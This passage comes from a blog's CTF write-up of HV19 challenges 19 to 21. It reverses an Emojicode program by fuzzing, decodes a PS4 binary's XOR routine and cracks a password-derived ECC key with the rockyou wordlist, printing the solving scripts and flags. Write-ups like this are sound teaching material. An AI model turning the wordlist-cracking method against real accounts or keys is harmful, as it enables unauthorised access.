<code>test<\/code>, we get a negative response (<code>Program panicked<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# .\/day19 \n &#128274; &#10145;&#65039; &#127877;&#127995;&#8265;&#65039; &#10145;&#65039; &#127876;&#128681; \ntest\n&#129327; Program panicked: &#128078;\nAborted<\/pre>\n<br\/>My first approach was to reverse the binary created by the Emojicode compiler. Though this did not seem to promise any quick wins. Thus I started to have a look at the Emojicode itself. The documentation is quite patchy, which also didn't make this too easy.\n<br\/>\n<br\/>At first let's indent the code. The Emojicode compiler is capable of formating a program by using the option <code>--format<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19\/Emojicode-1.0-beta.1-Linux-x86_64# .\/emojicodec --format ..\/day19.emojic\n...\nroot@kali:~\/hv19\/19\/Emojicode-1.0-beta.1-Linux-x86_64# cat ..\/day19.emojic\n&#127937; &#127815;\n  &#127926;&#128292;&#128007;&#129409;&#127839;&#128478;&#127856;&#128216;&#129366;&#128444;&#128681;&#129385;&#128565;&#9978;&#10071;&#65039;&#129360;&#128512;&#127817;&#129374;&#127937;&#128073;&#65039;&#129472;&#127822;&#127850;&#128640;&#128587;&#127956;&#127818;&#128539;&#128020;&#128647;&#128311;&#127926;&#128196;&#127846;&#128233;&#127819;&#128169;&#8265;&#65039;&#127812;&#129372;&#129430;&#128163;&#127876;&#129384;&#128250;&#129391;&#128253;&#127830;&#128032;&#128216;&#128068;&#127828;&#127829;&#128022;&#127789;&#127863;&#129425;&#127860;&#9962;&#129319;&#127775;&#128275;&#128293;&#127873;&#129510;&#129324;&#128690;&#128276;&#128367;&#129398;&#10084;&#65039;&#128142;&#128239;&#127897;&#127898;&#127899;&#128251;&#128241;&#128267;&#128520;&#128268;&#128187;&#128044;&#128424;&#128433;&#128434;&#128190;&#128191;&#129518;&#127909;&#127902;&#128270;&#128161;&#128294;&#127982;&#128212;&#128214;&#127961;&#128513;&#128164;&#128123;&#128756;&#128217;&#128218;&#129363;&#128211;&#128745;&#128220;&#128240;&#128514;&#127815;&#128661;&#128278;&#127991;&#128176;&#9972;&#128180;&#128184;&#128641;&#129398;&#128179;&#128526;&#128397;&#128654;&#129395;&#128221;&#128193;&#128450;&#129396;&#128197;&#128199;&#128200;&#128201;&#128202;&#128274;&#9924;&#127792;&#128375;&#9203;&#128215;&#128296;&#128736;&#129522;&#128039;&#128657;&#129514;&#128011;&#129516;&#128300;&#128301;&#128225;&#129322;&#128658;&#128137;&#128138;&#128719;&#128715;&#128701;&#128703;&#129524;&#129527;&#127849;&#129529;&#129530;&#128570;&#129531;&#128666;&#129519;&#128519;&#128684;&#128476;&#128125;&#128279;&#129520;&#127935;&#128759;&#129356;&#127919;&#127921;&#127918;&#127920;&#127922;&#127950;&#129397;&#129513;&#127917;&#127912;&#129525;&#129526;&#127932;&#127908;&#129345;&#127916;&#127993;&#127891;&#127870;&#128144;&#127838;&#128298;&#128165;&#128009;&#128667;&#129429;&#128272;&#127831;&#129312;&#128051;&#129515;&#128031;&#128421;&#128033;&#127804;&#129314;&#127799;&#127757;&#127752;&#10024;&#127885;&#127766;&#129327;&#128029;&#129440;&#129419;&#129326;&#127755;&#127973;&#127981;&#128509;&#9970;&#128175;&#127745;&#127747;&#128652;&#128213;&#128668;&#128705;&#128757;&#128678;&#128679;&#9973;&#128755;&#128186;&#128672;&#128752;&#127878;&#129301;&#128128;&#129299;&#129313;&#128122;&#129302;&#128076;&#128078;&#129504;&#128064;&#128564;&#128420;&#128292;&#10071;&#65039; &#10145;&#65039; &#12883;\n  &#127381;&#127855;&#128026;&#128290;&#127814;&#128056;&#10071;&#65039;&#10145;&#65039; &#128397;&#127381; &#12983;\n  &#128258; &#8984; &#127381;&#9193;&#9193; &#128020;&#127848; &#127814;&#10071;&#65039;&#128020;&#12883;&#10071;&#65039;&#10071;&#65039; &#127815;\n    &#8984; &#10145;&#65039; &#128061;&#12983; &#128061;&#12883; &#8984;&#10071;&#65039;&#10071;&#65039;\n  &#127817;\n\n  &#127926;&#128292;&#127860;&#127897;&#129430;&#128250;&#127817;&#128216;&#127830;&#128220;&#128276;&#127775;&#129425;&#10084;&#65039;&#128169;&#128267;&#10084;&#65039;&#128276;&#127817;&#128233;&#127902;&#127982;&#127775;&#128190;&#9962;&#128250;&#129391;&#129395;&#128292;&#10071;&#65039; &#10145;&#65039; &#127324;\n  &#127926;&#128292;&#128144;&#128033;&#129520;&#127922;&#129299;&#128666;&#129513;&#129313;&#128292;&#10071;&#65039; &#10145;&#65039; &#127356;\n  &#128512;&#128292; &#128274; &#10145;&#65039; &#127877;&#127995;&#8265;&#65039; &#10145;&#65039; &#127876;&#128681; &#128292;&#10071;&#65039;\n  &#128199;&#128298;&#127381;&#128289;&#128066;&#127996;&#10071;&#65039; &#128020;&#127848; &#127814;&#10071;&#65039;&#128020;&#127848; &#128078; &#127814;&#10071;&#65039;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#127292;\n  &#8618;&#65039; &#128020;&#127292;&#10071;&#65039; &#128588; &#128020;&#127848; &#127814;&#10071;&#65039; &#127815;\n    &#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;\n  &#127817;\n\n  &#9763;&#65039; &#127815;\n    &#127381;&#129504;&#127381; &#128020;&#127324;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#10003;\n    &#128258; &#8984; &#127381;&#9193;&#9193; &#128020;&#127848; &#127814;&#10071;&#65039;&#128020;&#127324;&#10071;&#65039;&#10071;&#65039; &#127815;\n      &#128061;&#12983; &#128061;&#127324; &#8984;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#8963;\n      &#128061;&#127292; &#8984; &#128686; &#128020;&#127292;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; ^\n      &#128167; &#127866;&#8963; &#10134; &#128020;&#12883;&#10071;&#65039; &#10135; &#128020;&#127848; &#128078; &#128077; &#127814;&#10071;&#65039;&#10071;&#65039; &#10060; ^ &#10060; &#128167;&#8984;&#10071;&#65039; &#10145;&#65039; &#9096;\n      &#8618;&#65039; &#8984; &#9664; &#128020;&#127356;&#10071;&#65039; &#129309; &#10062; &#127866;&#128061;&#12983; &#128061;&#127356; &#8984;&#10071;&#65039;&#10071;&#65039; &#10134; &#129308;&#128020;&#127324;&#10071;&#65039; &#10133; &#128020;&#127324;&#10071;&#65039; &#10134; &#128020;&#127292;&#10071;&#65039; &#10134; &#128020;&#127356;&#10071;&#65039; &#10133; &#128020;&#127848; &#128077; &#127814;&#10071;&#65039;&#129307; &#10006; &#128020;&#127848; &#128078; &#128078; &#128078; &#127814;&#10071;&#65039; &#128588; &#128290;&#9096;&#10071;&#65039;&#10071;&#65039; &#127815;\n        &#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;\n      &#127817;\n\n      &#9997;&#10003; &#9096;&#8984;&#128020;&#127848; &#128078; &#127814;&#10071;&#65039;&#10071;&#65039;\n    &#127817;\n\n    &#128289;&#127381;&#128199;&#129504; &#10003;&#128020;&#127324;&#10071;&#65039;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#8984;\n    &#8618;&#65039; &#8984; &#128588; &#129335;&#8205;&#9792;&#65039; &#127815;\n      &#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;\n    &#127817;\n\n    &#128512; &#127866;&#8984;&#10071;&#65039;\n  &#127817;\n\n&#127817;<\/pre>\n<br\/>The indented code can be read more easily. The following line seems to output the smileys, which we see when running the binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">  &#128512;&#128292; &#128274; &#10145;&#65039; &#127877;&#127995;&#8265;&#65039; &#10145;&#65039; &#127876;&#128681; &#128292;&#10071;&#65039;<\/pre>\n<br\/>Also there are multiple occurrences of the sequence, which seems to trigger the negative response (<code>Program panicked<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">&#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;<\/pre>\n<br\/>By adding an output (in this case a chicken) before the panic sequence, we can determine which one is actually triggered:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">&#128512;&#128292; &#128020; &#128292;&#10071;&#65039;\n&#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;<\/pre>\n<br\/>\n<br\/>In order to quickly run the adjusted program, we can use <a href=\"https:\/\/tio.run\/#emojicode6\" rel=\"noopener noreferrer\" target=\"_blank\">tio.run<\/a>. The indented code raises an error when trying to run it, but the adjustment can be done in the original code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_01_add.png\" \/>\n<br\/>\n<br\/>As we can see the output contains the chicken we added before the first panic sequence. This means that this is the one, which caused the program to terminate.\n<br\/>\n<br\/>When providing an input to the program, which can be done by simply entering it beneath the <code>Input<\/code> section, the chicken is not displayed anymore:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_02_nochicken.png\" \/>\n<br\/>\n<br\/>This means we passed the first panic sequence. Obviously this part of the code checked if there is any input at all.\n<br\/>\n<br\/>Now let's move the chicken to the second panic sequence in order to determine if this is the one, which terminates the program now:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_03_chicken.png\" \/>\n<br\/>\n<br\/>Now we can see that the chicken is displayed again. This means we hit the second panic sequence.\n<br\/>\n<br\/>When reviewing the indented code again, we can see that this second panic sequence is nested in a loop (&#128258;):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n    &#128258; &#8984; &#127381;&#9193;&#9193; &#128020;&#127848; &#127814;&#10071;&#65039;&#128020;&#127324;&#10071;&#65039;&#10071;&#65039; &#127815;\n      &#128061;&#12983; &#128061;&#127324; &#8984;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#8963;\n      &#128061;&#127292; &#8984; &#128686; &#128020;&#127292;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; ^\n      &#128167; &#127866;&#8963; &#10134; &#128020;&#12883;&#10071;&#65039; &#10135; &#128020;&#127848; &#128078; &#128077; &#127814;&#10071;&#65039;&#10071;&#65039; &#10060; ^ &#10060; &#128167;&#8984;&#10071;&#65039; &#10145;&#65039; &#9096;\n      &#8618;&#65039; &#8984; &#9664; &#128020;&#127356;&#10071;&#65039; &#129309; &#10062; &#127866;&#128061;&#12983; &#128061;&#127356; &#8984;&#10071;&#65039;&#10071;&#65039; &#10134; &#129308;&#128020;&#127324;&#10071;&#65039; &#10133; &#128020;&#127324;&#10071;&#65039; &#10134; &#128020;&#127292;&#10071;&#65039; &#10134; &#128020;&#127356;&#10071;&#65039; &#10133; &#128020;&#127848; &#128077; &#127814;&#10071;&#65039;&#129307; &#10006; &#128020;&#127848; &#128078; &#128078; &#128078; &#127814;&#10071;&#65039; &#128588; &#128290;&#9096;&#10071;&#65039;&#10071;&#65039; &#127815;\n        &#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;\n      &#127817;\n...<\/pre>\n<br\/>We can assume that this loop iterates over our input. In order to determine how often the loop iterates, let's move the output to the beginning of the loop body: \n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_04_patch.png\" \/>\n<br\/>\n<br\/>My hope was that the program is gradually checking the input within the loop, so that we can fuzz it byte by byte. If the beginning of our input matches, the loop should not terminate (panic sequence) and make another iteration. We could recognize this by the amount of chickens display before the termination. Unfortunately the first fuzzing attempts (fuzzing 1 and 2 bytes) did not even lead to a second loop iteration. Thus I tried to enter an unicode smiley as the input:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_05_morechicken.png\" \/>\n<br\/>\n<br\/>Now the loop actually did three iterations! Seems we are on the right way. So let's fuzz the program with unicode:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom pwn import *\ncontext.log_level = 21 # disable log\n\nutf32 = 0x0001f000\n\nwhile True:\n  u = unichr(utf32).encode('utf-8')\n  io = process('.\/loop_fuzz')\n  io.sendline(u)\n  r = io.recv(1000)\n  print(str(len(r.split('\\n'))) + ' ('+u.encode('hex')+')')\n  io.close()\n  utf32 += 1<\/pre>\n<br\/>The script starts at utf-32 <code>0x0001f000<\/code>, inputs the unicode character as utf-8 to the program using <a href=\"http:\/\/docs.pwntools.com\/en\/stable\/#\" rel=\"noopener noreferrer\" target=\"_blank\">pwntools<\/a> and displays the amount of lines printed by the program. This way we can determine, which unicode character produces the highest amount of loop iterations:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# .\/fuzz_unicode.py | tee fuzz_out.txt\n6 (f09f8080)\n6 (f09f8081)\n6 (f09f8082)\n6 (f09f8083)\n6 (f09f8084)\n6 (f09f8085)\n6 (f09f8086)\n6 (f09f8087)\n...<\/pre>\n<br\/>One unicode character produces an output of 29 lines:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# cat fuzz_out.txt | sort -rn | head\n29 (f09f9491)\n7 (f09f94bf)\n7 (f09f94be)\n7 (f09f94bd)\n7 (f09f94bc)\n7 (f09f94bb)\n7 (f09f94ba)\n7 (f09f94b9)\n7 (f09f94b8)\n7 (f09f94b7)<\/pre>\n<br\/>Wonder what this unicode character is?\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# python -c 'print(\"f09f9491\".decode(\"hex\"))'\n&#128273;\n<\/pre>\n<br\/>Well. This makes sense. Let's see the full output of the program entering the key:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# .\/day19 \n &#128274; &#10145;&#65039; &#127877;&#127995;&#8265;&#65039; &#10145;&#65039; &#127876;&#128681; \n&#128273;\nHV19{*&lt;|:-)____\\o\/____;-D}\n<\/pre>\n<br\/>In retrospect we could have guessed this. But this way it was quite more fun \ud83d\ude42\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{*<|:-)____\\o\/____;-D}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.20\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.20 - i&nbsp;want&nbsp;to&nbsp;play&nbsp;a&nbsp;game<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_20.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa was spying you on Discord and saw that you want something weird and obscure to reverse?\n<br\/>\n<br\/>your wish is my command.\n<br\/>\n<br\/><span class=\"link\">HV19-game.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains an <code>amd64 COFF<\/code> binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/20# unzip e22163c8-e0a4-475b-aef5-6a8aba51fd93.zip \nArchive:  e22163c8-e0a4-475b-aef5-6a8aba51fd93.zip\n  inflating: game                    \nroot@kali:~\/hv19\/20# file game \ngame: Intel amd64 COFF object file, no line number info, not stripped, 26 sections, symbol offset=0xb50, 99 symbols\n<\/pre>\n<br\/>Before analyzing the binary, it's usually worth running <code>strings<\/code> on the file:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/20# strings game \n.text\nP`.data\n.bss\n.rdata\nP@\/4\n...\nsendflag\nD$'H\nD$BH\n[A\\A]A^A_]\n*+^{9\nlibkernel.sprx\nsceKernelGetIdPs\nsceKernelGetOpenPsIdForSystem\n\/mnt\/usb0\/PS4UPDATE.PUP\n%02x\nf86d4f9d2c049547bd61f942151ffb55\nGCC: (GNU) 7.4.0\n...<\/pre>\n<br\/>There are a few interesting strings. <code>sendflag<\/code> seems juicy for obvious reasons. The string <code>\/mnt\/usb0\/PS4UPDATE.PUP<\/code> in combination with the architecture of the binary reassures that this is a PlayStation 4 binary. The string <code>f86d4f9d2c049547bd61f942151ffb55<\/code> seems to be a MD5 hash. When googling the value we can find <a href=\"https:\/\/lania.co\/ps4_505.html\" rel=\"noopener noreferrer\" target=\"_blank\">this page<\/a>, which provides a PS4 firmware (<code>505Retail.PUP<\/code>). The MD5 hash of the firmware image is exactly <code>f86d4f9d2c049547bd61f942151ffb55<\/code>.\n<br\/>\n<br\/>With this background knowledge, let's have a look at the binary using <code>ghidra<\/code>. There is only a single function called <code>_main<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/20_01_ghidra.png\" width=\"900px\"\/>\n<br\/>\n<br\/>At the beginning of the function a few initialization functions are called. After this a file is opened in order to calculate the MD5 hash using the functions <code>MD5Init<\/code>, <code>MD5Update<\/code> and <code>MD5Final<\/code>. The reference to the filename being opened seems to be not correctly decompiled by ghidra. Though we have already seen the filename <code>\/mnt\/usb0\/PS4UPDATE.PUP<\/code> within the binary. After calculating the MD5 hash, the hash is stored in a string using <code>sprintf<\/code>. This string is then compared to a static string using <code>strcmp<\/code>. Again we notice that the reference doesn't seem to be correct, though we can make the quite obvious assumption, that the hash is compared to the MD5 hash we already found: <code>f86d4f9d2c049547bd61f942151ffb55<\/code>. Only if the MD5 hash of the file matches this hash, the execution continues. This means that the file in question is actually the PS4 firmware we found previously (<code>505Retail.PUP<\/code>). Let's further inspect the decompilation:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/20_02_ghidra2.png\" width=\"900px\"\/>\n<br\/>\n<br\/>If the hash matches, <code>0x1a<\/code> bytes are copied from a static location to a stack buffer. By inspecting the <code>.rdata_3<\/code> section of the binary using <code>radare2<\/code>, we can see the already referenced values (filename, format string and MD5 hash) and additional 0x1a bytes at the beginning of the section. These are obviously the bytes, which are copied to the stack buffer:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">[0x00000439]&gt; iS\n[Sections]\nNm Paddr       Size Vaddr      Memsz Perms Name\n00 0x00000424   752 0x00000424   752 -r-x .text_0\n01 0x00000000     0 0x00000000     0 -rw- .data_1\n02 0x00000000     0 0x00000000     0 -rw- .bss_2\n03 0x00000714   176 0x00000714   176 -r-- .rdata_3\n...\n\n[0x00000439]&gt; px 300 @ 0x00000714\n- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF\n0x00000714  ce55 954e 38c5 89a5 1b6f 5e25 d21d 2a2b  .U.N8....o^%..*+\n0x00000724  5e7b 3914 8ed0 f0f8 f8a5 006c 6962 6b65  ^{9........libke\n0x00000734  726e 656c 2e73 7072 7800 7363 654b 6572  rnel.sprx.sceKer\n0x00000744  6e65 6c47 6574 4964 5073 0073 6365 4b65  nelGetIdPs.sceKe\n0x00000754  726e 656c 4765 744f 7065 6e50 7349 6446  rnelGetOpenPsIdF\n0x00000764  6f72 5379 7374 656d 0072 6200 2f6d 6e74  orSystem.rb.\/mnt\n0x00000774  2f75 7362 302f 5053 3455 5044 4154 452e  \/usb0\/PS4UPDATE.\n0x00000784  5055 5000 2530 3278 0000 0000 0000 0000  PUP.%02x........\n0x00000794  6638 3664 3466 3964 3263 3034 3935 3437  f86d4f9d2c049547\n0x000007a4  6264 3631 6639 3432 3135 3166 6662 3535  bd61f942151ffb55\n0x000007b4  0000 0000 0000 0000 0000 0000 0000 0000  ................\n0x000007c4  4743 433a 2028 474e 5529 2037 2e34 2e30  GCC: (GNU) 7.4.0\n0x000007d4  0000 0000 0000 0000 0000 0000 0000 0000  ................\n...<\/pre>\n<br\/>Further following the decompiled output in ghidra we can see a variable (<code>lVar8<\/code>) is initialized with the value <code>0x1337<\/code> and the same file as before is opened. After this a loop is entered, which sets the file position indicator to the value of <code>lVar8<\/code> using <code>fseek<\/code> and reads 0x1a bytes at this position. After this another loop is entered, which iterates over the 0x1a bytes of the stack buffer XORing every byte with the next byte read from the file. At the end of the outer loop, the value of <code>lVar8<\/code> is increased by <code>0x1337<\/code>. The outer loop terminates if the value reaches <code>0x1714908<\/code>. After this the stack buffer seems to be send over the network. Since we have enough information at this point, let's recreate the steps carried out by the code in python:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\n# read file content\nfile_content = open('505Retail.PUP').read()\n\n# 0x1a bytes from .rdata_3\nflag = list('ce55954e38c589a51b6f5e25d21d2a2b5e7b39148ed0f0f8f8a5'.decode('hex'))\n\nlVar8 = 0x1337\nwhile (lVar8 != 0x1714908):\n  for lVar9 in range(0x1a):\n    flag[lVar9] = chr(ord(flag[lVar9]) ^ ord(file_content[lVar8+lVar9]))\n  lVar8 += 0x1337\n\nflag = ''.join(flag)\nprint(flag)<\/pre>\n<br\/>Running the script prints the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/20# .\/rev.py \nHV19{C0nsole_H0mebr3w_FTW}\n<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{C0nsole_H0mebr3w_FTW}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.21\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.21 - Happy&nbsp;Christmas&nbsp;256<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_21.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa has improved since the last Cryptmas and now he uses harder algorithms to secure the flag.\n<br\/>\n<br\/>This is his public key:\n<br\/><pre>X: 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f\n<br\/>Y: 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943c\n<br\/><\/pre>To make sure this is safe, he used the NIST P-256 standard.\n<br\/>\n<br\/>But we are lucky and an Elve is our friend. We were able to gather some details from our whistleblower:\n<br\/><ul><li>Santa used a password and SHA256 for the private key (d)<\/li><li>His password was leaked 10 years ago<\/li><li>The password is length is the square root of 256<\/li><li>The flag is encrypted with AES256<\/li><li>The key for AES is derived with pbkdf2_hmac, salt: \"TwoHundredFiftySix\", iterations: 256*256*256<\/li><\/ul>\n<br\/>Phew - Santa seems to know his business - or can you still recover this flag?\n<br\/><pre>Hy97Xwv97vpwGn21finVvZj5pK\/BvBjscf6vffm1po0=<\/pre><\/td><\/tr><\/tbody><\/table>\n<br\/>We can follow the description line by line to recover the flag.\n<br\/>\n<br\/>The first information we get is the following:\n<br\/><ul><li>NIST P-256<\/li><li>X: 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f<\/li><li>Y: 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943c<\/li><\/ul>Accordingly NIST P-256 with the above mentioned public key was used. We don't know the private key (<code>d<\/code>) yet:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">from Crypto.PublicKey import ECC\n\nx = 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f\ny = 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943c\nd = ???\nECC.construct(curve='NIST P-256',point_x=x,point_y=y,d=d)\n<\/pre>\n<br\/>The next information we get regards the unknown private key (<code>d<\/code>):\n<br\/><ul><li>Santa used a password and SHA256 for the private key (d)<\/li><li>His password was leaked 10 years ago<\/li><li>The password is length is the square root of 256<\/li><\/ul>The mentioned leak is probably the famous <code>rockyou.txt<\/code>. This is narrowed down by stating that the length of the password is the square root of 256 = 16. This password has been hashed using <code>SHA256<\/code>, which was then used as the private key <code>d<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">wl = '\/usr\/share\/wordlists\/rockyou.txt'\nwords = open(wl).read().split('\\n')\n\nfor word in words:\n  if (len(word) != 16): continue\n  m_sha256 = hashlib.sha256()\n  m_sha256.update(word)\n  d = int(m_sha256.hexdigest(), 16)\n<\/pre>\n<br\/>At this point we already have enough information to recover the password. Surely there are a lot of passwords with the length 16 in the <code>rockyou.txt<\/code>, but the construction of the ECC key will only succeed if the public key (<code>x<\/code> and <code>y<\/code>) matches the private key (<code>d<\/code>). This means if the ECC key can be constructed successfully, we got the correct private key \/ password.\n<br\/>\n<br\/>The last information the description contains is the following:\n<br\/><ul><li>The flag is encrypted with AES256<\/li><li>The key for AES is derived with pbkdf2_hmac, salt: \"TwoHundredFiftySix\", iterations: 256*256*256<\/li><li>Encryted flag: Hy97Xwv97vpwGn21finVvZj5pK\/BvBjscf6vffm1po0=<\/li><\/ul>Accordingly we only have to calculate the <code>pbkdf2_hmac<\/code> with the above mentioned settings. The result is an AES key, which can be used to decrypt the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">aes_key = hashlib.pbkdf2_hmac('sha256', word, 'TwoHundredFiftySix', 256*256*256)\ncipher = AES.new(aes_key, AES.MODE_ECB)\nflag = cipher.decrypt(flag_encr)<\/pre>\n<br\/>Summing this all up in a full script:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom Crypto.PublicKey import ECC\nfrom Crypto.Cipher import AES\nimport hashlib\n\nwl = '\/usr\/share\/wordlists\/rockyou.txt'\nwords = open(wl).read().split('\\n')\nflag_encr = 'Hy97Xwv97vpwGn21finVvZj5pK\/BvBjscf6vffm1po0='.decode('base64')\nx = 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f\ny = 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943c\n\nfor word in words:\n  if (len(word) != 16): continue\n  try:\n    m_sha256 = hashlib.sha256()\n    m_sha256.update(word)\n    d = int(m_sha256.hexdigest(), 16)\n    ECC.construct(curve='NIST P-256',point_x=x,point_y=y,d=d)\n  except: continue\n  print('got password: ' + word)\n  print('calculating AES key ...')\n  aes_key = hashlib.pbkdf2_hmac('sha256', word, 'TwoHundredFiftySix', 256*256*256)\n  print('AES key: ' + aes_key.encode('hex'))\n  cipher = AES.new(aes_key, AES.MODE_ECB)\n  flag = cipher.decrypt(flag_encr)\n  print(flag)\n  quit()<\/pre>\n<br\/>Running it yields the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/21# .\/craxxor.py\ngot password: santacomesatxmas\ncalculating AES key ...\nAES key: eb1e0442ca6566e5d687740d246caea6db3b2851f774140d153c848d59515705\nHV19{sry_n0_crypt0mat_th1s_year}\n<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{sry_n0_crypt0mat_th1s_year}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.22\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.22 - The&nbsp;command&nbsp;...&nbsp;is&nbsp;lost<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_22.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">Santa bought this gadget when it was released in 2010. He did his own DYI project to control his sledge by serial communication over IR. Unfortunately Santa lost the source code for it and doesn't remember the command needed to send to the sledge. The only thing left is this file: <span class=\"link\">thecommand7.data<\/span>\n<br\/>\n<br\/>Santa likes to start a new DYI project with more commands in January, but first he needs to know the old command. So, now it's on you to help out Santa.<\/td><\/tr><\/tbody><\/table>\n<br\/>The provided file is an <a href=\"https:\/\/en.wikipedia.org\/wiki\/Intel_HEX\" rel=\"noopener noreferrer\" target=\"_blank\">Intel HEX file<\/a> for an arduino:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/22# cat 